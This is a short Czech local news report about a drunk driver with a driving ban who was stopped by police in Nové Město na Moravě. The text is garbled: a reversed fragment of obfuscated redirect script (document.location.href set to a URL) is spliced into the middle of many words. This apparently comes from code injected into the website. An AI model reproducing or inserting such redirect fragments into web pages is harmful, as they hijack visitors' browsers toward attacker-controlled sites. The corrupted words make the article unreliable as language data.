Rainbow page separator

Za volant šofér sedl podnapilý, navíc se zákazem do roku 2025

Sobota, 30. ledna 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Osobní au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobil značky Škoda, jehož řidičem byl osmačtyřicetiletý muž, zastavili ve středu 27. ledna kolem půl šesté večer v novoměstské ulici Brněnská tamní policisté.
„Řidič se v rámci běžné silniční kontroly podrobil dechové zkoušce. Její výsledek byl pozitivní a naměřená hodnota činila 1,13 promile alkoholu. Výsledky opakovaných měření byly 1,02 a 1,08 promile,“ upřesnila policejní mluvčí Stanislava Rázlová. Mimo [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že řidič před jízdou požil alkoholické nápoje, byla prostřednictvím lustrace zjištěna i skutečnost, že má vyslovený zákaz řízení a za volant au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilu nesmí usednout až do roku 2025.
„V další jízdě již pokračovat nesměl. Policisté vše zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali a zahájili úkony trestního řízení pro podezření ze spáchání dvou trestných činů, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ohrožení pod vlivem návykové látky a maření výkonu úředního rozhodnutí,“ doplnila policejní mluvčí.

ilustrační fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to